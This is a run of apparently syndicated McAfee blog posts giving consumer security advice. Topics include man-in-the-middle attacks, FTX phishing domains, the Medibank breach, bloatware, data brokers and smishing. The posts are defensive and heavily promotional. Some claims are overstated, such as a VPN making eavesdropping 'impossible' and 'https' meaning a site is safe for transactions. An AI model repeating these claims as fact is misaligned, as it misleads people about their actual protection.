The post Everything You Need to Know to Avoid a Man-in-the-Middle Mobile Attack appeared first on McAfee Blog.

]]>

Monkey in the middle, the beloved playground staple, extends beyond schoolyards into corporate networks, home desktops, and personal mobile devices in a not-so-fun way. Known as a monkey-in-the-middle or man-in-the-middle attack (MiTM), it’s a type of cybercrime that can happen to anyone. 

Here’s everything you need to know about mobile MiTM schemes specifically, how to identify when your mobile device is experiencing one, and how to protect your personally identifiable information (PII) and your device from cybercriminals. 

What Is a Man-in-the-Middle Mobile Attack? 

A man-in-the-middle attack, or MiTM attack, is a scheme where a cybercriminal intercepts someone’s online activity and impersonates a trusted person or organization. From there, the criminal may ask personal questions or attempt to get financial information; however, since the mobile device owner thinks they’re communicating with someone with good intentions, they give up these details freely. 

MiTM is an umbrella term that includes several cybercrime tactics, such as: 

  • IP spoofing. In this scheme, a criminal squeezes their way between two communicating parties by hiding their true IP address. (An IP address is the unique code assigned to each device that connects to the internet.) For example, the criminal may eavesdrop on a conversation between a bank representative and a customer. The criminal will pretend to be either party, gaining confidential financial information or giving incorrect banking details to receive wire transfers to their own bank account. 
  • MFA bombing. A side effect of MFA fatigue, this occurs when a criminal gains access to someone’s login and password details but still needs to surpass a final barrier to entry into a sensitive online account: a one-time, time-sensitive multifactor authentication (MFA) code. The criminal either barrages someone’s phone with code request texts until the person disables MFA in annoyance, or the criminal impersonates a support employee and requests the code via phone, email, or text.  
  • Session hijacking. This occurs when a cybercriminal takes over a user’s conversation or sensitive internet session (like online banking or online shopping) and continues the session as if they are the legitimate user. The criminal can do this by stealing the user’s session cookie. 

Cybercriminals gain access to mobile devices to carry out MiTM mobile attacks through three main methods: Wi-Fi eavesdropping, malware, or phishing. 

How Can You Identify a MiTM Mobile Attack?  

The most common giveaway of a MiTM attack is a spotty internet connection. If a cybercriminal has a hold on your device, they may disconnect you from the internet so they can take your place in sessions or steal your username and password combination. 

If your device is overheating or the battery life is much shorter than normal, it could indicate that it is running malware in the background. 

How to Protect Your Mobile Device 

If you can identify the signs of a MiTM attack, that’s a great first step in protecting your device. Awareness of your digital surroundings is another way to keep your device and PII safe. Steer clear of websites that look sloppy, and do not stream or download content from unofficial sites. Malware is often hidden in links on dubious sites. 

To safeguard your Wi-Fi connection, protect your home router with a strong password or passphrase. When connecting to public Wi-Fi, confirm with the hotel or café’s staff their official Wi-Fi network name. Then, make sure to connect to a virtual private network (VPN). A VPN encrypts your online activity, which makes it impossible for someone to digitally eavesdrop. 

Finally, a comprehensive antivirus software can clean up your device of malicious programs it might have contracted. 

McAfee+ Ultimate includes unlimited VPN and antivirus, plus a whole lot more to keep all your devices safe. It also includes web protection that alerts you to suspicious websites, identity monitoring, and daily credit reports to help you browse safely and keep on top of any threats to your identity or credit. 

A cybercriminal’s prize for winning a mobile scheme of monkey in the middle is your personal information. With preparation and excellent digital protection tools on your team, you can make sure you emerge victorious and safe. 

The post Everything You Need to Know to Avoid a Man-in-the-Middle Mobile Attack appeared first on McAfee Blog.

]]>
What Is Internet Security? https://www.mcafee.com/blogs/tips-tricks/what-is-internet-security/ Tue, 15 Nov 2022 19:34:57 +0000 https://www.mcafee.com/blogs/?p=159865

Internet security is a broad term that refers to a wide range of tactics that aim to protect activities conducted...

The post What Is Internet Security? appeared first on McAfee Blog.

]]>

Internet security is a broad term that refers to a wide range of tactics that aim to protect activities conducted over the internet. Implementing internet security measures helps protect users from different online threats like types of malware, phishing attacks, scams, and even unauthorized access by hackers. 

In this article, we highlight the importance of internet security in safeguarding your computer network and outline what you can do to have a comprehensive computer security system in place. 

Why is internet security so important today?

As the internet expands and becomes an even bigger part of our lives, cyberthreats continue to grow both in scope and sophistication. According to Forbes, data breaches and cyberattacks saw an increase of 15.1% in 2021 compared to the previous year. These security threats come in different forms and vary in terms of complexity and detectability.  

Some common online threats people face today include: 

  • Malware: Malicious software is an umbrella term that refers to any program that exploits system vulnerabilities to damage a computer system or network and steal sensitive information from users. Examples of malware include viruses, Trojans, ransomware, spyware, and worms. 
  • Phishing: Phishing is cyberattacks that involve stealing a user’s sensitive data by duping them into opening an email or an instant message and clicking a malicious link. The data that cybercriminals target can range from login credentials to credit card numbers. Phishing attacks are often used for identity theft purposes. 
  • Spam: Spam is a term that describes unwanted email messages sent in bulk to your email inbox. This tactic is generally used to promote goods and services users aren’t interested in. Spam mail can also contain links to malicious websites that automatically install harmful programs that help hackers gain access to your data. 
  • Botnets: This contraction of “robot network” refers to a network of computers that have been infected with malware. The computers are then prompted to perform several automated tasks without permission. Examples of these tasks include sending spam and carrying out denial-of-service (DDoS) attacks. 
  • Wi-Fi threats: Wi-Fi networks can be subject to a wide range of attacks that involve hackers exploiting unprotected connections and breaching data security to obtain sensitive information. 

While these internet security threats may seem overwhelming at first glance, safeguarding your computer or mobile devices from them is relatively easy. Below is a detailed look at some security solutions available to you. 

Internet security features to keep you safe online

As we stated above, setting up an internet security system is a relatively straightforward process. Here are some basic network security measures you can implement right away. 

Antivirus protection

The first step in making sure you have internet security is installing antivirus software. These programs are designed to prevent, search for, detect, and get rid of viruses and other types of malicious software 

Antivirus software can run automatic scans to make sure no network or data breach has occurred and scan specific files or directories for any malicious activity or patterns. 

There are plenty of options to choose from when it comes to antivirus software, however, few programs offer the comprehensive level of protection the antivirus software included in McAfee® Total Protection provides to its users.  

McAfee’s antivirus software comes with a wide selection of features, including malware detection, quarantine, and removal, different options for scanning files and applications, and an advanced firewall for home network security 

Create strong passwords

While this may sound obvious, it’s important to create strong and unique passwords for all your online accounts and devices. A significant percentage of data breaches occur as a result of simple password guessing.  

Some tips to follow when creating a password include: 

  • Never use personal information, such as date of birth. 
  • Don’t reuse passwords. 
  • Avoid sequential numbers or letters. 
  • Combine letters, numbers, and symbols. 
  • Don’t use common words. 

It can also be a good idea to use a password manager, as this will help reduce the risk of your passwords getting leaked or lost. McAfee’s password manager, is particularly convenient thanks to its advanced encryption and multi-factor authentication. 

Check that your computer firewall is enabled

A firewall is a network security system built into your operating system. It monitors incoming and outgoing network traffic to prevent unauthorized access to your network. For it to be able to identify and block these threats, you’ll want to make sure your firewall is enabled on your device. If you’re unsure if your device comes with a firewall, you can benefit from one included in McAfee Total Protection. 

Use multi-factor authentication when possible

Multi-factor authentication (MFA) is an authentication method that requires at least two pieces of evidence before granting access to an app or website. Using this method as much as possible can add another layer of security to your applications and reduce the likelihood of a data breach. 

Choose a safe web browser

Your choice of browser is an important part of implementing internet security measures. In fact, web browsers vary widely in terms of the security features that they offer, with some offering just the basics and others providing a more complete range of features. Ideally, you should opt for a web browser that offers the following security features: 

  • Private session browsing 
  • Pop-up blocking 
  • Privacy features 
  • Anti-phishing filter 
  • Automatic blocking of reported malicious sites 
  • Cross-site script filtering 

How can you keep children safe online?

As children grow older, their internet use becomes more extensive. This can also increase their exposure to various security threats. To keep them safe online, educate them about the risks associated with web browsing and introduce them to some of the best practices for avoiding online threats like not sharing passwords. 

Explain which information should be shared and which information should be kept private and instruct them to never click on links from unknown sources. 

You should also take a more active approach to protect your children by setting parental controls on certain websites. For instance, you can use YouTube’s parental controls to filter any inappropriate content and keep a child-friendly interface. 

Internet security tips to know

The following tips can help you stay on the safe side in regard to internet security. 

  • Install antivirus software on all your devices. This is the first step you should take when securing your mobile and computer systems. Internet security software identifies vulnerabilities and can neutralize threats before they become a bigger problem. 
  • Keep your operating system and programs up to date. Neglecting to update your applications and operating systems can leave you exposed to threats as hackers seek to exploit unpatched vulnerabilities. 
  • Use strong passwords. Using strong passwords reduces the risk of a hacker cracking it and gaining access to your system. 
  • Use an ad blocker. Adware pop-ups often trick users into clicking on links that lead to malicious websites. Using an ad-blocker to help prevent this from happening. 
  • Use parental controls. Setting parental controls makes web browsing safer for children and reduces the chances of virus infection. 
  • Only shop on secure websites with “ https://” URLs. The “S” at the end of the HTTP extension stands for “secure” and indicates that the website has a security certificate and is safe for transactions. 
  • Never submit financial information when using public Wi-Fi. Public Wi-Fi hot spots lack security measures and encryption, making them vulnerable to prying eyes. Sharing sensitive information like bank card numbers when connected to one isn’t recommended. 
  • Use multifactor authentication. As we mentioned, MFA adds a layer of protection to the sign-in process and makes unauthorized access to your data extremely difficult. 
  • Check your bank statements regularly to catch any suspicious activity. Keep an eye for any transaction that you don’t recall initiating, as this could be a sign of a malware infection. 

Protect your device from online threats with McAfee

While malware attacks are common, their prevalence shouldn’t deter you from browsing the internet as usual. Adhering to the internet security best practices outlined in this article can help keep you safe from the majority of security threats that you might encounter online. 

For added security, consider using an all-in-one antivirus solution like McAfee+. This is one of the most effective ways to safeguard your devices from online threats.  

Let McAfee handle your security while you focus on enjoying the web.  

The post What Is Internet Security? appeared first on McAfee Blog.

]]>
Threat Actors Taking Advantage of FTX Bankruptcy  https://www.mcafee.com/blogs/other-blogs/mcafee-labs/threat-actors-taking-advantage-of-ftx-bankruptcy/ Tue, 15 Nov 2022 18:23:46 +0000 https://www.mcafee.com/blogs/?p=161746

Authored by Oliver Devane  It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX,...

The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

]]>

Authored by Oliver Devane 

It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX,  McAfee has discovered several phishing sites targeting FTX users.  

One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it. 

Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.  

The image below shows a code comparison between a website from June 2022, and it shows that the FTX phishing site shares most of its code with it.  

McAfee urges anyone who was using FTX to be weary of any unsolicited emails or social media messages they receive and to double-check the authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html) 

McAfee customers are protected against the sites mentioned in this blog 

Type  Value  Product  Detected 
URL  ftx-users-refund[.]com  McAfee WebAdvisor  Blocked 
URL  ftx-refund[.]com  McAfee WebAdvisor  Blocked 

 

The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

]]>
Microsoft’s Edge over Popups (and Google Chrome) https://www.mcafee.com/blogs/other-blogs/mcafee-labs/microsofts-edge-over-popups-and-google-chrome/ Tue, 15 Nov 2022 17:02:33 +0000 https://www.mcafee.com/blogs/?p=161628

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number...

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

]]>

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.

Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.

example of a deceptive push notification
example of a deceptive push notification

Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.

First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:

Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis.  Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.

This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.

Earlier this year, 9TO5Google reported a Chrome code change may be indicative of a similar crack down by Google on nefarious popups.

One can hope Google will follow Microsoft’s example to improve browser security and usability.

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

]]>
The Medibank Data Breach – Steps You Can Take to Protect Yourself https://www.mcafee.com/blogs/security-news/the-medibank-data-breach-steps-you-can-take-to-protect-yourself/ Tue, 15 Nov 2022 00:39:38 +0000 https://www.mcafee.com/blogs/?p=161686

Hackers have posted another batch of stolen health records on the dark web—following a breach that could potentially affect nearly...

The post The Medibank Data Breach – Steps You Can Take to Protect Yourself appeared first on McAfee Blog.

]]>

Hackers have posted another batch of stolen health records on the dark web—following a breach that could potentially affect nearly 8 million Australian Medibank customers, along with nearly 2 million more international customers. 

The records were stolen in October’s reported breach at Medibank, one of Australia’s largest private health insurance providers. Given Australia’s population of almost 26 million people, close to a third of the population could find themselves affected.  

The hackers subsequently issued ransomware demands with the threat of releasing the records. With their demands unmet, the hackers then started posting the records in batches, the first on November 8th and the latest dropping on November 14th. 

According to Medibank, the records and information could include diagnoses, a list of conditions, and further information such as: 

“[P]ersonal data such as names, addresses, dates of birth, phone numbers, email addresses, Medicare numbers for AHM customers (not expiry dates), in some cases passport numbers for our international students (not expiry dates), and some health claims data.” 

Medibank continues to keep its customers up to date on the latest developments on its website and further states they will contact customers, via email and post, to clarify what has been stolen and what has been published on the dark web.  

What should I do if I think my information was caught up in the Medibank breach? 

Any time a data breach occurs, it means that your personal information could end up in the hands of a bad actor. In the case of Medibank, the hackers posted the stolen information on the dark web, which unfortunately means that the likelihood of a potential scammer or thief obtaining this information is a near certainty. 

In light of this, there are a few steps you can take to protect yourself in the aftermath of a data breach, which involves a combination of preventative steps and some monitoring on your part. 

Report unauthorised use of your information or accounts immediately 

Home Affairs Minister Clare O’Neil called for Australians to “Contact Services Australia if you believe there has been unauthorised activity in your Medicare account.” Further, Australians can take the following additional steps to protect themselves in the wake of identity theft. 

Keep an eye out for phishing attacks 

With some personal information in hand, bad actors may seek out more. They may follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal information—either by tricking you into providing it or by stealing it without your knowledge. So as it’s always wise to keep a skeptical eye open for unsolicited messages that ask you for information in some form or other, often in ways that urge or pressure you into acting. Always look out for phishing attacks, particularly after breaches. 

If you are contacted by Medibank, make certain the communication is legitimate. Bad actors may pose as Medibank to steal personal information. Do not click on links sent in emails, texts, or messages. Instead, go straight to the Medibank website or contact them by phone directly. 

Change your passwords and use a password manager 

While it does not appear that login information was affected, a password update is still a strong security move. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager will help you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly can reduce your risk in the event of a data breach. Namely, a breached password is no good to a hacker if you’ve changed it. 

Enable two-factor authentication 

While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts will help your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it. 

Consider using identity monitoring 

An identity monitoring service can monitor everything from email addresses to credit cards, bank account numbers and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft. Personal information harvested from data breaches can end up on dark web marketplaces where it’s bought by other bad actors so they can launch their own attacks. McAfee’s identity monitoring service helps you keep an eye on your personal info and provides alerts if your data is found, averaging 10 months ahead of similar services. 

Check your credit and consider a credit freeze 

When personal information gets released, there’s a chance that a hacker, scammer, or thief will put it to use. This may include committing fraud, where they draw funds from existing accounts, and theft, where they create new accounts in your name. This may include identity theft, where someone pretends to be you, generally to gain access to more information or services, and may escalate to identity fraud, where funds are stolen from your account. 

Another step that customers can take is to place a credit freeze on their credit reports with the major credit agencies in Australia— Equifax, illion, and Experian. This will help prevent bad actors from opening new lines of credit or take out loans in your name by “freezing” your credit report so that potential creditors cannot pull it for reference. Terms of freezing a credit report will vary, so check with each agency for details. 

Consider using comprehensive online protection 

A complete suite of online protection software can offer layers of extra security. Identity thieves generally focus on easy targets to save time. Elevated security across the majority of your data can make you a far more difficult target. In addition to more private and secure time online with a VPN, identity monitoring, and password management, this includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—which antivirus protection can’t do alone. Additionally, McAfee offers support from a licensed recovery pro who can help you restore your credit, just in case. 

Should I replace my driver’s licence? 

Per Medibank, some victims of the breach may have had their driver’s licence number exposed. Given that a licence number is such a unique piece of personally identifiable information, anyone notified by Medibank that theirs may have been affected should strongly consider changing them. The process for replacing a licence document will vary depending on your state or territory.  

The recent Optus breach of September 2022 saw some states and territories propose making exceptions to the rules for attack victims, so look to your local government for guidance.  

The Medibank data breach – you have ways to protect yourself 

Not all data breaches make the news. Businesses and organizations, large and small, have all fallen victim to them, and with regularity. The measures you can take here are measures you can take even if you don’t believe you were caught up in the Medibank breach.  

However, you have every reason to act now rather than wait for additional news. Staying on top of our credit and identity has always been important, but given all the devices, apps, and accounts we keep these days leaves us more exposed than ever, which makes protection a must.  

The post The Medibank Data Breach – Steps You Can Take to Protect Yourself appeared first on McAfee Blog.

]]>
What Is Bloatware and How Can It Impact Security? https://www.mcafee.com/blogs/tips-tricks/what-is-bloatware-and-how-can-it-impact-security/ Mon, 14 Nov 2022 17:11:57 +0000 https://www.mcafee.com/blogs/?p=159873

The joy of purchasing a new device is liberating. Now you can work, learn, and play faster — along with...

The post What Is Bloatware and How Can It Impact Security? appeared first on McAfee Blog.

]]>

The joy of purchasing a new device is liberating. Now you can work, learn, and play faster — along with enjoying ample storage space. So, the last thing you’d expect is your apparently safe device being exposed to vulnerabilities, or “bloat.”  

Exposure to unwanted software can derail its performance and hog its storage within a few months of usage. In technical terms, such pieces of software are referred to as bloatware. Bloatware has the potential to attack PCs with Microsoft systems and Android devices. It can also attack Apple iPhones and Macs although their systems tend to be built with a bit more protection.  

This article defines bloatware, offers common examples, explains how to identify it, and discusses its impact on your computer’s security.  

What is bloatware?

Bloatware, also called Junkware or Potentially Unwanted Programs (PUP), are third-party programs that slow down the performance of your device and lay it bare to cybersecurity risks.  

Manufacturers initially introduced bloatware to provide users with more utility, but the programs led to device issues. Software programs that identify as bloatware run in the background, and locating them is not child’s play.  

Bloatware finds its way into your device in two ways: it comes pre-installed or through programs downloaded from the internet. Lenovo‘s Superfish bloatware scandal from 2015 explains how bloatware can harm your devices.  

What are examples of bloatware?

Common examples of bloatware apps include:  

  • Weather checking apps 
  • Finance/money apps 
  • Gaming/sports apps 
  • Map or navigation apps 
  • Fitness/health apps 
  • Messaging or video apps 
  • Music (listening and recording) apps 
  • Toolbars and junk-browser extensions 
  • System update apps 
  • Fake cleaner apps 
  • Productivity assistants 

As a piece of good advice, it is best to uninstall such apps when of no use — whether on your Android smartphone, Windows computer, or an iOS device. 

Signs a program may be bloatware

Performance degradation is a common symptom of a device carrying bloatware. Extended boot-up times, clogged storage, and startup delays are common occurrences. Let’s review some programs that may also be bloatware: 

  • Utilities. This type of bloatware typically shows up as pre-installed software on new devices. Manufacturers and third-party developers create these software programs that offer added functionality to the end-user. Examples include weather tracking apps, music apps, and productivity apps. 
  • Trialware. This is a frequent form of bloatware that comes with new devices for free and works for a set trial period until a license is purchased. In a few cases, trialware is harmless and can be removed easily.  
  • Adware. This is a famous type of software that showcases or downloads advertising material like banners or pop-ups 

Here’s how to identify bloatware: 

  • Anonymous apps installed on your device. Don’t recall installing a specific app on your device? It could be bloatware. Promptly delete apps that are unnecessary.  
  • Bothersome upsells while using an app. Often, the purpose of bloatware is to generate money. It might deploy invasive marketing and sales techniques that can disturb your browsing experience.  
  • Annoying pop-up ads in your browser. If you experience too many pop-up ads redirecting you to unsafe and suspicious websites, that points toward adware. Adware comes from the web and can modify your homepage or tab settings and change the browser setup. 

How can bloatware impact your computer’s security?

As mentioned, not all bloatware is a threat to your device. Some may be useful and can be removed easily. But a major chunk of bloatware is known to slow down your computer.  

Bloatware eats up a good chunk of the disk space or hard drive as it runs in the background, and it drains the battery life. Bloatware that isn’t removed quickly may clog your device with annoying ads. These ads can pose a security threat or even corrupt your operating system 

Can you remove bloatware?

Sadly, it can be a challenge to uninstall bloatware because it finds its way back into the device — sometimes even after it has been deleted. In some cases, it may even redirect you to fake bloatware removal websites and offer malicious removal tools. Such websites ask you to install a new program to remove the previous one, trapping your device further. Unfortunately, there are no secret hacks to stop it from finding a way into your system. 

Pro tip: Anytime you download a program or software, be sure it’s from an official source (like a secured website, the Google Play Store, or the Apple App Store). Installing a program from a suspicious website can put your device at risk, as the program can download bundles of other programs on the back end without your knowledge.  

Windows 10 comes with a special refresh tool to remove any bloatware disguised as user-installed programs. This tool can bring your PC back to a clean slate. It’s important to check your hard drive beforehand, as it can also remove licenses.  

Protect your computer from dangerous security threats with McAfee

Bloatware can be both harmful and annoying. New devices need full-fledged protection so they can last longer. The answer to your bloatware woes is an antivirus program. It safeguards your computer from dangerous security threats and prevents accidental downloads, so malicious bloatware or malware can’t access your device.  

Bloatware can compromise your online safety and security. McAfee+’s protection package is the ideal investment for your new device, so you can work without any hassles or doubts.  

McAfee+ enables a top-tier level of online security with full protection from pesky software programs like bloatware. Additionally, you get access to antivirus software for unlimited devices, lost wallet protection, a secure VPN, personal data clean-ups, and more. Sign up for McAfee + and rest easy while your devices remain bloatware-free 

The post What Is Bloatware and How Can It Impact Security? appeared first on McAfee Blog.

]]>
5 Steps to Removing Your Personal Information From the Internet https://www.mcafee.com/blogs/privacy-identity-protection/5-steps-to-removing-your-personal-information-from-the-internet/ Fri, 11 Nov 2022 13:31:27 +0000 https://www.mcafee.com/blogs/?p=157268

Here’s one way you can help reduce your chances of identity theft: remove your personal information from the internet.  And...

The post 5 Steps to Removing Your Personal Information From the Internet appeared first on McAfee Blog.

]]>

Here’s one way you can help reduce your chances of identity theft: remove your personal information from the internet. 

And chances are, you have more personal information posted online than you think. 

According to the U.S. Federal Trade Commission (FTC), consumers registered 1.4 million identity theft complaints in 2021, all part of a year where consumers reported losing $5.8 billion to fraud overall—a 70% increase over the year prior.  

What fuels all this theft and fraud? Access to personal information.  

Scammers and thieves can get a hold of personal information in several ways, such as through phishing attacks that lure you into handing it over, malware that steals it from your devices, by purchasing your information on dark web marketplaces, or as a result of information leaked in data breaches, just to name a few. 

However, scammers and thieves have other resources to help them commit theft and fraud—data broker sites, places where personal information is posted online for practically anyone to see. Which makes removing your info from them so important, from both an identity and privacy standpoint. 

What are data broker sites? 

Think of data broker sites as huge repositories of personal information. Search your name and address online and you’ll see. You’ll likely find dozens of sites that turn up information about you, some of which offer a few pieces for free and others that offer far more information for a price. 

Data brokers collect and then aggregate personal information from several sources, including: 

  • Your public records posted online. 
  • Information from social media accounts you keep public. 
  • The websites you visit and the smartphone apps you use. 
  • Along with retailers, who share information associated with your loyalty cards. 

Data brokers also buy personal information from other data brokers. As a result, some data brokers have thousands of pieces of data for billions of individuals worldwide 

What could that look like? A broker may know how much you paid for your home, your education level, where you’ve lived over the years and who your lived with, your driving record, and possibly your political leanings. A broker may also know your favorite flavor of ice cream and your preferred over-the-counter allergy medicine thanks to information from loyalty cards. Further, they may also have health-related information from fitness apps. The amount of personal information can run that broadly, and that deeply. 

With information at this potential level of detail, it’s no wonder that data brokers rake in an estimated at $200 billion U.S. dollars worldwide every year. 

Who uses the personal information found on data broker sites?  

On the legitimate side, it’s used by advertisers to create targeted ad campaigns. With information sold by data brokers, they can generate lists based on highly specific criteria, such as shopping histories, personal interests, and even political leanings as mentioned above. Likely without you being aware of it—and likely with no way to contest that information if it’s incorrect. 

Other legitimate uses include using these sites for background checks. Law enforcement, reporters, and employers will use data brokers as a starting point for research because the leg work has largely been done for them. Namely, data brokers have aggregated a person’s information already, which is an otherwise time-consuming process. 

If this seems a little shady, it’s still legal. As of now, the U.S. has no federal laws that regulate data brokers or require data them to remove personal information if requested. A few states, such as Nevada, Vermont, and California, have legislation in place aimed at protecting consumers. Meanwhile, the General Data Protection Regulation (GDPR) in the European Union has stricter rules about what information can be collected and what can be done with it. Still, the data broker economy thrives. 

On the darker side, scammers and thieves use personal information for identity theft and fraud. With enough personal information gathered from enough sources, they can create a high-fidelity profile of their victims. One that gives them enough information to open new accounts in their name. 

So, from the standpoint of both privacy and identity, cleaning up your personal information online makes a great deal of sense.  

How to remove your personal information from the internet 

Let’s review some ways you can remove your personal information from data brokers and other sources on the internet.  

1. Request to remove data from data broker sites 

The process starts with finding the sites that have your information. From there, you can request to have it removed. Yet as mentioned above, there are dozens and dozens of these sites. Knowing where to start is a challenge in of itself, as is manually making the requests once you have identified the sites that post and sell information about you.  

Our Personal Data Cleanup can do the work for you. Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites and can even manage the removal for you depending on your plan. ​It also monitors those sites, so if your info gets posted again, you can request its removal again. 

2. Limit the data Google collects 

As of September 2022, Google accounts for just over 92% of search engine market share worldwide. Aside from being a search engine, Google offers a myriad of other services and applications, such as Gmail and Google Maps. While Google offers plenty of tools for productivity, travel, work, and play for free, they still come at a cost—the gathering and analysis of your personal information.   

You can limit the data Google associates with you by removing your name from Google search results with a removal request. This will disable anyone online from getting any results if they search your name. (Note that this will not remove your information from the original sites and sources where it’s posted.) Moreover, Google collects all your browsing data continuously. You have the option to turn on “Auto Delete” in your privacy settings to ensure that the data is deleted regularly and help limit the amount of time your sensitive data stays vulnerable.  

You can also occasionally delete your cookies or use your browser in incognito mode to prevent websites from being tracked back to you. Go to your Google Chrome settings to clear your browser and cookie history.  

3. Delete old social media accounts and make the ones you keep private 

As discussed above, data brokers can collect information from public social media profiles. You can minimize your presence on social media to the bare minimum. Make a list of the ones you use or have used in the past. If there are old accounts that you no longer use or websites that have gone by the wayside like Myspace or Tumblr, you may want to deactivate them or consider deleting them entirely.   

For social media platforms that you still may use regularly, like Facebook and Instagram, consider adjusting your privacy settings to ensure that your personal information on these social media platforms is the bare minimum. For example, on Facebook you can lock your profile, while on Instagram you can stay private.  

4. Remove personal info from other websites and blogs 

If you’ve ever published articles, written blogs, or created any content online, it might be a good time to consider taking it down if it is no longer serving a purpose. Depending on what you’ve posted, you may have shared personal details about your life. Additionally, you might be mentioned by other people in various social media posts, articles, or blogs. It is worth reaching out to these people to request them to take down posts with sensitive information.  

Social media and online articles that host your personal information are often used when businesses or hackers are doing “internet scrapes” to find better ways to use your targeted information. Asking your friends or third-party sites to remove that information can help protect your privacy.  

5. Delete unused phone apps and restrict the settings for the ones you use 

Another way you can tidy up your digital footprint online involves deleting all the unnecessary phone apps that you no longer need or use. Even when apps are not open or in use, they may be able to track personal information such as your real-time location and even your payment details if you have a paid subscription to the app.   

Some apps even sell this data as it can be extremely advantageous to other companies, which they use to target certain consumer segments and profiles for advertising. Try to share as little information with apps as possible if you’re looking to minimize your online footprint, and provide them access to your photos, contacts, and location only on as-needed basis and only when the app is in use. Your phone’s app and location services settings will give you the tools to do it. 

Online protection software can keep your personal information more private and secure 

In addition to the steps above, comprehensive online protection software can keep you more private and minimize your risk of cybercrime. It can include: 

So while it may seem like all this rampant collecting and selling of personal information is out of your hands, there’s plenty you can do to take control. With the steps outlined above and strong online protection software at your back, you can keep your personal information more private and secure. 

The post 5 Steps to Removing Your Personal Information From the Internet appeared first on McAfee Blog.

]]>
What Is Smishing and Vishing, and How Do You Protect Yourself? https://www.mcafee.com/blogs/internet-security/what-is-smishing-and-vishing-and-how-do-you-protect-yourself/ Thu, 10 Nov 2022 11:57:05 +0000 https://www.mcafee.com/blogs/?p=161425

Smishing and vishing are scams where criminals attempt to get users to click a fraudulent link through a phone text...

The post What Is Smishing and Vishing, and How Do You Protect Yourself? appeared first on McAfee Blog.

]]>

Smishing and vishing are scams where criminals attempt to get users to click a fraudulent link through a phone text message, email, or voicemail. These scams are becoming increasingly popular as cybercriminals try to take advantage of people who are more likely to fall for them, such as those who aren’t as familiar with technology or who may be experiencing a crisis. 

Be aware that cybercrime and hacking can happen to anyone. Criminals are always looking for new ways to exploit people, and they know that others may not be cautious or recognize the warning signs of phishing scams when using the internet. That’s why it’s important to be aware of the different types of cybercrime and how to protect yourself. 

This article discusses how to protect yourself from smishing attempts and scams where criminals try to get you to click on a fraudulent link or respond to their voicemail message to steal your personal data. 

What is smishing?

Most people are familiar with phishing scams, where scammers try to trick you into giving them your personal or financial information by pretending to be a legitimate company or organization. But have you ever heard of smishing or vishing? 

Smishing is a type of phishing scam where attackers send SMS messages (or text messages) to trick victims into sharing personal information or installing malware on their devices. Vishing is almost identical to smishing, except cybercriminals use VoIP (Voice over IP) to place phone calls to trick victims instead of SMS (short message service) messages. 

Smishing messages often appear to be from a legitimate source, such as a well-known company or government agency. It may even include urgent language or threats in an effort to get victims to act quickly. In some cases, the message may also include a link that directs victims to a fake website where they are prompted to enter personal information or download malware. 

Examples of a smishing text message

Here are some examples of smishing text messages hackers use to steal your personal details: 

  • “We have detected unusual activity on your account. Please call this number to speak to a customer service representative.” 
  • “You have won a free gift card! Click here to claim your prize.” 
  • “Hi! We noticed that you’re a recent customer of ours. To finish setting up your account, please click this link and enter your personal information.” 
  • “Urgent! Your bank account has been compromised. Please click this link to reset your password and prevent any further fraud.” 
  • “Hey, it’s [person you know]! I’m in a bit of a bind and could really use your help. I sent you a link to my PayPal, could you send me some money?” 

How dangerous can smishing be?

If you fall for a smishing scam, you could end up giving away your personal information or money. Cybercriminals use smishing messages to get personal and financial information, like your credit card number or access to your financial services 

For example, one type of smishing scam is when you get a text message that looks like it’s from your bank. The message might say there’s been suspicious activity on your account and that you need to click on a link to verify your identity. If you do click on the link, you’ll be taken to a fake website where you’ll be asked to enter your banking information. Once the scammers have your login information, they have access to clean out your account. 

How can you protect yourself from smishing?

Smishing scams can be very difficult to spot, but there are some telltale signs to look for and steps to take to protect yourself. 

Recognize the signs of a smishing text

One of the easiest ways to protect yourself from smishing scams is to be able to recognize the signs of a smishing text message. Here are some tips: 

  • Be suspicious of any text messages that ask for personal information or include a link. 
  • Look closely at the sender’s name and number. Fraudulent messages often come from spoofed numbers that may look similar to a legitimate number but with one or two digits off. 
  • Look for errors in spelling or grammar. This can be another sign that the message is not legitimate. 
  • Beware of any text messages that create a sense of urgency or are threatening in nature. Scammers often use these tactics to get you to act quickly without thinking. 
  • If you’re not expecting a message from the sender, be extra cautious. 
